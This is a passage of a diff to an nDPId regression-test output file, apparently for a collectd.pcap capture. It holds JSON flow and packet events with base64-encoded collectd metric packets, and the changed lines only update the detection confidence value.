RAAMABjMAAAYADwABAgAAAAAASKDCAAgADBiqht7\/ZKNFAAMABjEAAAUACnN0ZWFsAAAGAA8AAQIAAAAAAAAAAAAIAAwYqobe\/2SguQADAAYwAAAGAA8AAQIAAAAAAAAAAAAIAAwYqobe\/2S1gAAFAAlpZGxlAAAGAA8AAQIAAAAAAEZc0AAIAAwYqobe\/2oc5AACAAttZW1vcnkAAAMABQAABAALbWVtb3J5AAAFAAl1c2VkAAAGAA8AAQEAAAAAtontQQAFAA1idWZmZXJlZAAABgAPAAEBAAAAADhkwEEABQAJZnJlZQAABgAPAAEBAAAAAHDUukEABQALY2FjaGVkAAAGAA8AAQEAAAAABq7mQQAFABBzbGFiX3VucmVjbAAABgAPAAEBAAAAAEDQl0EABQAOc2xhYl9yZWNsAAAGAA8AAQEAAAAAQAOpQQAFAA5hdmFpbGFibGUAAAYADwABAQAAAAAUXOtBAAgADBiqhuF\/ZJVYAAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAAl1c2VyAAAGAA8AAQIAAAAAABad0gAIAAwYqobhf2TUUQADAAYxAAAGAA8AAQIAAAAAABXmKwAIAAwYqobhf2W8mgADAAYzAAAGAA8AAQIAAAAAABXnBwAIAAwYqobhf2X1\/wADAAYwAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKSOAAgADBiqhuF\/ZQ4SAAMABjIAAAUACXVzZXIAAAYADwABAgAAAAAAFAdJAAgADBiqhuF\/Z6HGAAMABjEAAAUAC3N5c3RlbQAABgAPAAECAAAAAAAEo4cACAAMGKqG4X9n2XUAAwAGMgAABgAPAAECAAAAAAAEmWAACAAMGKqG4X9ojcQAAwAGMAAABQAJd2FpdAAABgAPAAECAAAAAAAAQ20ACAAMGKqG4X9oFFcAAwAGMwAABQALc3lzdGVtAAAGAA8AAQIAAAAAAASGyQAIAAwYqobhf2k\/YgADAAYxAAAFAAl3YWl0AAAGAA8AAQIAAAAAAABDbwAIAAwYqobhf2nIHgADAAYyAAAGAA8AAQIAAAAAAABGSgAIAAwYqobhf2p39QADAAYwAAAFAAluaWNlAAAGAA8AAQIAAAAAAAAAJgAIAAwYqobhf2qAfQADAAYxAAAGAA8AAQIAAAAAAAAAMQAIAAwYqobhf2qRzgADAAYzAAAGAA8AAQIAAAAAAAAAMAAIAAwYqobhf2qMEQADAAYyAAAGAA8AAQIAAAAAAAAAKwAIAAwYqobhf2rtCAADAAYxAAAFAA5pbnRlcnJ1cHQAAAYADwABAgAAAAAAAKO5AAgADBiqhuF\/axE6AAMABjIAAAYADwABAgAAAAAAANAv"} -00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":22,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655315218479,"flow_last_seen":1655315251746,"flow_idle_time":200000,"flow_min_l4_payload_len":1231,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":1306,"midstream":0,"thread_ts_msec":1655315403990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655315218479,"flow_last_seen":1655315251746,"flow_idle_time":200000,"flow_min_l4_payload_len":1231,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":1306,"midstream":0,"thread_ts_msec":1655315433990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} -00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":34,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1655315313991,"flow_last_seen":1655315503990,"flow_idle_time":200000,"flow_min_l4_payload_len":1311,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":30569,"flow_avg_l4_payload_len":1329,"midstream":0,"thread_ts_msec":1655315503990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} -00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":55,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1655315313991,"flow_last_seen":1655315683990,"flow_idle_time":200000,"flow_min_l4_payload_len":1311,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":58483,"flow_avg_l4_payload_len":1329,"midstream":0,"thread_ts_msec":1655315683990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":22,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655315218479,"flow_last_seen":1655315251746,"flow_idle_time":200000,"flow_min_l4_payload_len":1231,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":1306,"midstream":0,"thread_ts_msec":1655315403990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655315218479,"flow_last_seen":1655315251746,"flow_idle_time":200000,"flow_min_l4_payload_len":1231,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":1306,"midstream":0,"thread_ts_msec":1655315433990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":34,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1655315313991,"flow_last_seen":1655315503990,"flow_idle_time":200000,"flow_min_l4_payload_len":1311,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":30569,"flow_avg_l4_payload_len":1329,"midstream":0,"thread_ts_msec":1655315503990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":55,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1655315313991,"flow_last_seen":1655315683990,"flow_idle_time":200000,"flow_min_l4_payload_len":1311,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":58483,"flow_avg_l4_payload_len":1329,"midstream":0,"thread_ts_msec":1655315683990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315734133,"flow_last_seen":1655315734133,"flow_idle_time":200000,"flow_min_l4_payload_len":1334,"flow_max_l4_payload_len":1334,"flow_tot_l4_payload_len":1334,"flow_avg_l4_payload_len":1334,"midstream":0,"thread_ts_msec":1655315734133,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36832,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02226{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1655315734133,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1376,"pkt_l4_len":1342,"thread_ts_msec":1655315734133,"pkt":"AAAAAAAAAAAAAAAACABFAAVSgypAAEARtG5\/AAABfwAAAY\/gZOIFPgNSAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqh0MI68hQAAkADAAAAAKAAAAAAAIAC21lbW9yeQAABAALbWVtb3J5AAAFAAtjYWNoZWQAAAYADwABAQAAAADeOudBAAUACWZyZWUAAAYADwABAQAAAAAAgbhBAAUADWJ1ZmZlcmVkAAAGAA8AAQEAAAAAKHzAQQAFAA5hdmFpbGFibGUAAAYADwABAQAAAADEo+tBAAUADnNsYWJfcmVjbAAABgAPAAEBAAAAAEBJqUEABQAJdXNlZAAABgAPAAEBAAAAAPA87UEABQAQc2xhYl91bnJlY2wAAAYADwABAQAAAACA4ZdBAAgADBiqh0WIfqylAAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAAl1c2VyAAAGAA8AAQIAAAAAABawWQAIAAwYqodFiH7fdQADAAYxAAAGAA8AAQIAAAAAABX5TAAIAAwYqodFiH8ZSwADAAYyAAAGAA8AAQIAAAAAABQZhwAIAAwYqodFiH+y0wADAAYxAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKntAAgADBiqh0WIf7qeAAMABjIAAAYADwABAgAAAAAABJ\/lAAgADBiqh0WIf9wOAAMABjMAAAYADwABAgAAAAAABI1BAAgADBiqh0WIgAgcAAMABjEAAAUACXdhaXQAAAYADwABAgAAAAAAAEPAAAgADBiqh0WIgBAPAAMABjIAAAYADwABAgAAAAAAAEdRAAgADBiqh0WIf+U8AAMABjAAAAYADwABAgAAAAAAAEPlAAgADBiqh0WIf0BEAAMABjMAAAUACXVzZXIAAAYADwABAgAAAAAAFfl+AAgADBiqh0WIgBZ8AAUACXdhaXQAAAYADwABAgAAAAAAAD55AAgADBiqh0WIgBzpAAMABjAAAAUACW5pY2UAAAYADwABAgAAAAAAAAAmAAgADBiqh0WIgEZ6AAMABjIAAAYADwABAgAAAAAAAAArAAgADBiqh0WIgFc\/AAMABjAAAAUADmludGVycnVwdAAABgAPAAECAAAAAAABD\/MACAAMGKqHRYiAgLMAAwAGMgAABgAPAAECAAAAAAAA0OMACAAMGKqHRYh\/gyQAAwAGMAAABQALc3lzdGVtAAAGAA8AAQIAAAAAAASq\/AAIAAwYqodFiICRmAAFAAxzb2Z0aXJxAAAGAA8AAQIAAAAAAADr3gAIAAwYqodFiIBNyQADAAYzAAAFAAluaWNlAAAGAA8AAQIAAAAAAAAAMAAIAAwYqodFiICZhwADAAYxAAAFAAxzb2Z0aXJxAAAGAA8AAQIAAAAAAAB0EgAIAAwYqodFiICIwAADAAYzAAAFAA5pbnRlcnJ1cHQAAAYADwABAgAAAAAAAG4vAAgADBiqh0WIgMnmAAMABjAAAAUACnN0ZWFsAAAGAA8AAQIAAAAAAAAAAAAIAAwYqodFiIA7sAADAAYxAAAFAAluaWNlAAAGAA8AAQIAAAAAAAAAMQAIAAwYqodFiIDvvAADAAYyAAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqHRYiA9t4AAwAGMwAABgAPAAECAAAAAAAAAAAACAAMGKqHRYiAwRUABQAMc29mdGlycQAABgAPAAECAAAAAAAAOukACAAMGKqHRYiAYIQAAwAGMQAABQAOaW50ZXJydXB0AAAGAA8AAQIAAAAAAACk0AAIAAwYqodFiIDnzgAFAApzdGVhbAAABgAPAAECAAAAAAAAAAA="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315734133,"flow_last_seen":1655315734133,"flow_idle_time":200000,"flow_min_l4_payload_len":1334,"flow_max_l4_payload_len":1334,"flow_tot_l4_payload_len":1334,"flow_avg_l4_payload_len":1334,"midstream":0,"thread_ts_msec":1655315734133,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36832,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315734133,"flow_last_seen":1655315734133,"flow_idle_time":200000,"flow_min_l4_payload_len":1334,"flow_max_l4_payload_len":1334,"flow_tot_l4_payload_len":1334,"flow_avg_l4_payload_len":1334,"midstream":0,"thread_ts_msec":1655315734133,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36832,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 02203{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1655315744133,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1362,"pkt_l4_len":1328,"thread_ts_msec":1655315744133,"pkt":"AAAAAAAAAAAAAAAACABFAAVEhDdAAEARs29\/AAABfwAAAY\/gZOIFMANEAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqh0WIgKHRAAkADAAAAAKAAAAAAAIACGNwdQAAAwAGMgAABAAIY3B1AAAFAAxzb2Z0aXJxAAAGAA8AAQIAAAAAAABTPAAIAAwYqodFiIOdBwACAAttZW1vcnkAAAMABQAABAALbWVtb3J5AAAFAAl1c2VkAAAGAA8AAQEAAAAAoGDtQQAFAA1idWZmZXJlZAAABgAPAAEBAAAAANB8wEEABQALY2FjaGVkAAAGAA8AAQEAAAAAaj7nQQAFAAlmcmVlAAAGAA8AAQEAAAAAQEW3QQAFAA5hdmFpbGFibGUAAAYADwABAQAAAAAUgOtBAAUAEHNsYWJfdW5yZWNsAAAGAA8AAQEAAAAAQNqXQQAFAA5zbGFiX3JlY2wAAAYADwABAQAAAABgSqlBAAgADBiqh0WIgTDLAAIACGNwdQAAAwAGMwAABAAIY3B1AAAFAAlpZGxlAAAGAA8AAQIAAAAAAEklFQAIAAwYqodFiIEhWgADAAYxAAAGAA8AAQIAAAAAAEiJggAIAAwYqodFiIEpPwADAAYyAAAGAA8AAQIAAAAAAEpc4AAIAAwYqodFiIEZKAADAAYwAAAGAA8AAQIAAAAAAEbfpQAIAAwYqodICH80ewAFAAl1c2VyAAAGAA8AAQIAAAAAABaw1AAIAAwYqodICH91uQADAAYxAAAGAA8AAQIAAAAAABX5xwAIAAwYqodICIAQ0QADAAYwAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKsuAAgADBiqh0gIgFQ+AAMABjIAAAYADwABAgAAAAAABKAUAAgADBiqh0gIgEmkAAMABjEAAAYADwABAgAAAAAABKofAAgADBiqh0gIgF6NAAMABjMAAAYADwABAgAAAAAABI1xAAgADBiqh0gIf+ECAAUACXVzZXIAAAYADwABAgAAAAAAFfn5AAgADBiqh0gIgGnkAAMABjAAAAUACXdhaXQAAAYADwABAgAAAAAAAEPnAAgADBiqh0gIgMRWAAMABjEAAAYADwABAgAAAAAAAEPBAAgADBiqh0gIgNdDAAMABjMAAAYADwABAgAAAAAAAD58AAgADBiqh0gIgO5RAAMABjIAAAUACW5pY2UAAAYADwABAgAAAAAAAAArAAgADBiqh0gIgOBWAAMABjAAAAYADwABAgAAAAAAAAAmAAgADBiqh0gIgOc0AAMABjEAAAYADwABAgAAAAAAAAAxAAgADBiqh0gIgRLpAAMABjMAAAYADwABAgAAAAAAAAAwAAgADBiqh0gIgSllAAMABjEAAAUADmludGVycnVwdAAABgAPAAECAAAAAAAApNkACAAMGKqHSAiBOJYAAwAGMwAABgAPAAECAAAAAAAAbjQACAAMGKqHSAiBYGMAAwAGMAAABQAMc29mdGlycQAABgAPAAECAAAAAAAA6+YACAAMGKqHSAh\/nGIAAwAGMgAABQAJdXNlcgAABgAPAAECAAAAAAAUGgQACAAMGKqHSAiBZ\/8AAwAGMQAABQAMc29mdGlycQAABgAPAAECAAAAAAAAdBwACAAMGKqHSAiAzz8AAwAGMgAABQAJd2FpdAAABgAPAAECAAAAAAAAR1UACAAMGKqHSAiBe7cAAwAGMwAABQAMc29mdGlycQAABgAPAAECAAAAAAAAOuwACAAMGKqHSAiBhSgAAwAGMAAABQAKc3RlYWwAAAYADwABAgAAAAAAAAAA"} 02212{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1655315754132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1368,"pkt_l4_len":1334,"thread_ts_msec":1655315754132,"pkt":"AAAAAAAAAAAAAAAACABFAAVKil5AAEARrUJ\/AAABfwAAAY\/gZOIFNgNKAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqh0gIgY30AAkADAAAAAKAAAAAAAIACGNwdQAAAwAGMQAABAAIY3B1AAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiByMEAAwAGMwAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiBcUEAAwAGMgAABQAMc29mdGlycQAABgAPAAECAAAAAAAAUz8ACAAMGKqHSAiB0JMAAwAGMAAABQAJaWRsZQAABgAPAAECAAAAAABG4skACAAMGKqHSAiB3pAAAwAGMgAABgAPAAECAAAAAABKYAwACAAMGKqHSAiB1uQAAwAGMQAABgAPAAECAAAAAABIjKAACAAMGKqHSAiB5qEAAwAGMwAABgAPAAECAAAAAABJKEEACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAJdXNlZAAABgAPAAEBAAAAAGaR7UEABQANYnVmZmVyZWQAAAYADwABAQAAAABgfcBBAAgADBiqh0gIgR9KAAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAA5pbnRlcnJ1cHQAAAYADwABAgAAAAAAAQ\/5AAgADBiqh0gIg2eWAAIAC21lbW9yeQAAAwAFAAAEAAttZW1vcnkAAAUAC2NhY2hlZAAABgAPAAEBAAAAABRC50EACAAMGKqHSAiBMQAAAgAIY3B1AAADAAYyAAAEAAhjcHUAAAUADmludGVycnVwdAAABgAPAAECAAAAAAAA0OkACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAQc2xhYl91bnJlY2wAAAYADwABAQAAAADA25dBAAgADBiqh0gIgb+WAAIACGNwdQAAAwAGMgAABAAIY3B1AAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAOYXZhaWxhYmxlAAAGAA8AAQEAAAAA6E7rQQAFAAlmcmVlAAAGAA8AAQEAAAAAwJ+1QQAFAA5zbGFiX3JlY2wAAAYADwABAQAAAAAgTKlBAAgADBiqh0qIftQ9AAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAAl1c2VyAAAGAA8AAQIAAAAAABaxWwAIAAwYqodKiH8nRwADAAYxAAAGAA8AAQIAAAAAABX6SQAIAAwYqodKiH9osQADAAYyAAAGAA8AAQIAAAAAABQajAAIAAwYqodKiH+V7gADAAYzAAAGAA8AAQIAAAAAABX6jAAIAAwYqodKiH\/NZwADAAYwAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKtmAAgADBiqh0qIgA6xAAMABjEAAAYADwABAgAAAAAABKpXAAgADBiqh0qIgBbKAAMABjIAAAYADwABAgAAAAAABKBGAAgADBiqh0qIgB0cAAMABjMAAAYADwABAgAAAAAABI2rAAgADBiqh0qIgCfPAAMABjAAAAUACXdhaXQAAAYADwABAgAAAAAAAEPsAAgADBiqh0qIgC9\/AAMABjEAAAYADwABAgAAAAAAAEPBAAgADBiqh0qIgDfpAAMABjIAAAYADwABAgAAAAAAAEdVAAgADBiqh0qIgD96AAMABjMAAAYADwABAgAAAAAAAD6AAAgADBiqh0qIgEcAAAMABjAAAAUACW5pY2UAAAYADwABAgAAAAAAAAAm"} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":70,"source":"collectd.pcap","alias":"nDPId-test","packets-captured":70,"packets-processed":69,"total-skipped-flows":0,"total-l4-payload-len":90410,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":5,"total-detection-updates":0,"total-updates":3,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":44,"global_ts_msec":1655315824133} -00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":76,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1655315313991,"flow_last_seen":1655315720484,"flow_idle_time":200000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":63954,"flow_avg_l4_payload_len":1305,"midstream":0,"thread_ts_msec":1655315864132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":76,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1655315313991,"flow_last_seen":1655315720484,"flow_idle_time":200000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":63954,"flow_avg_l4_payload_len":1305,"midstream":0,"thread_ts_msec":1655315864132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655316151465,"flow_last_seen":1655316151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1655316151465,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02293{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1655316151465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":1655316151465,"pkt":"AAAAAAAAAAAAAAAACABFAAVysRJAAAERFprAqLIj78BKQpqYZOIFXrI+AhAFVgAEdXNlcsEiWwf\/ecmHq20KMKY60TNgWTifxhUWZCzzOonut\/nBLF1H9\/qjrU5R7\/H5O\/9DCfuI7YKK9r+lg3rOUKcDtnx6k3gtNCOgHQsqM7rGW+eN33S1hv\/QWiqJh22vfUfr7Wz7pYGKApBiZvpQtTEhc5hAetf3FPDtHKTWmaIAv9tpMJ\/C1iMPcZFdIsr2dDPokYbKhkO7YK1VgRFBm2eTLctpolFTqtNDbNm7ZZj+J4aMD2mZJnGIwYcXGtrkRXSRyBums+W0\/jz8zVPv3F9mqHBPDINnDWvpLDLobIdObIJno8I9jJWIUvexsFajL\/Ozn6gm5h5Bbary3bFaI1eTK9\/2PtGLDA75C4TnHGlqTybsnLPrgfJgwREyLUHKyyjysSqq3nmcDjg2jxv7jB\/7C1x4ERVxqcLGWKVSyPtJGgd833gDOhBdG4xbUSAQLAZ93ZhNhqDYpSH1iLu4WeSFrvXELH+6cym0Y6TgPbHb995Xd4eeznstGpKVPXUMBMYKyolrAJf5IhADYmfwsVbHYwmMY4b+7dLe8Xm4J6pnNHkCQ8D8q\/xlIjpnUrS9OVed\/2DlDBS1QStbE\/5D9qtP1vKoQWi7aNQljNk4LIQq71gjvpOQoYs5A2fU7jqs5Cj7g1YVzvRN1szG+q0InctAJFWNqveI4E4VlH\/arcTeRtG6STEypPhnpvREi8Y1HMoKqCoQ2XNXh6LreKH8j13m7n5IUINrWLGczoOvwh46DPuvBo2KGeZrJslABigBIDcj82i9s8gLnjLw9\/JZ2x7gkouGNhGSwI6E+HHJlTbRNuUsv\/6rZpEcDEihG4n3z7Vt80LO+ANJQ1PEO96u3kHeqsvkky84XapbdS3hpG\/ZxbNSNY8nK4OCSOQQ8HmKfoJVs6uDOBd\/wp2958CwlilWA+S7vIiQ1XgDMWkpnLBj0SxBkzaVjTocJQTqqyWTwe3IhhIJv81ISkko8HlqeLw6ucXInaAjACXZe+tWeEVUOeFlwkGIIzC1N4S0VtZ61SexhHWzr\/i9+G9ZKKsehcu3XJBgh1f60wB6VdfrKhuC5O+DjSawaWC4SpBpu+HXc5ivM+uiz5tYgYFHvZZNAX520+pU7SYW1nlm8z8\/p7hrSy4or4XEkX6alUhb2dPGHzFD8JaAiNPkifbtDixhZdVcES3WwpR0Ee8a2+96wN6EZWNgwUs7rB2p7yVJHR76cDlQ4Kn2ZsRDtijNF38f24MQDLxP4V3sCe2kxcWUIAwjR6dboGGToHbd4gC7kvh\/FM9CeCXw8edRrjHiX4wnTLxVl9Tka0gXAevnElxIQ6DbX8f3r7039o6XRuqpxn0ACZ1UjAWdNP5AnrGPEDhQYcbCL1rrIoiDXNbcbYfPGBMR0rENIqKDB4er0OJ0AMEmws1dKMgg8kdYXjcu2lTLVY4\/4d9fGNXECu0E+IBVi1I\/a05N27robtMnHhQS3RLkMgdw2UHSJmRpgA2AeN7d5fzdRb1cndtHczkpZ4DqnETqYT245MmiMyzhppvI8TfDhCd1ynjvTf\/tCkooHN2LdiiRy3Nwel6jnMS4sDovy8cCEn9qicofWJUG7y5a\/VIh54v0RwEEnumWw\/ZdPXVhbMfahFcQa0uAqmRQ+1dUag87w7YOq0bDC6ojsLdQ0XEWCC562cwnsSkgbZ5fTl3ZKIGjfA5C2IbcoLoeLIRL87MyrjfoqdSbenCEN1JHvCKm8MwRfUxtBnRG6JvCJKg82EHDqygdxWBY5xyz+WlvhZcsZvu\/jKGESQRQiW2wuv9DlwnzHiLS\/qJ\/XT4Fpxe9+g=="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655316151465,"flow_last_seen":1655316151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1655316151465,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655316151465,"flow_last_seen":1655316151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1655316151465,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 